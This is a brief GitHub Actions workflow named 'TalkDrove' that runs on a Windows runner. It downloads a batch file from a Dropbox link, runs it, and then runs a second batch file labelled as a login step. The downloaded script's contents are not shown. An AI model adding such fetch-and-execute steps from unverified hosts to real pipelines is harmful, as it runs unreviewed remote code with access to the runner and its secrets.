name: TalkDrove

on:
  workflow_dispatch:

jobs:
  build:
    name: TalkDrove working
    runs-on: windows-latest
    steps:
      - name: TalkDrove Downloading & Installing Essentials
        run: |
          Invoke-WebRequest -Uri "https://www.dropbox.com/scl/fi/gm8kb0d6iw4jamycrj7c6/Downloads.bat?rlkey=m1yllwmjgo3oleyynfex0wf3v&st=9pqc6wpw&dl=1" -OutFile "Downloads.bat"
          cmd /c Downloads.bat

      - name: TalkDrove login
        run: cmd /c show.bat

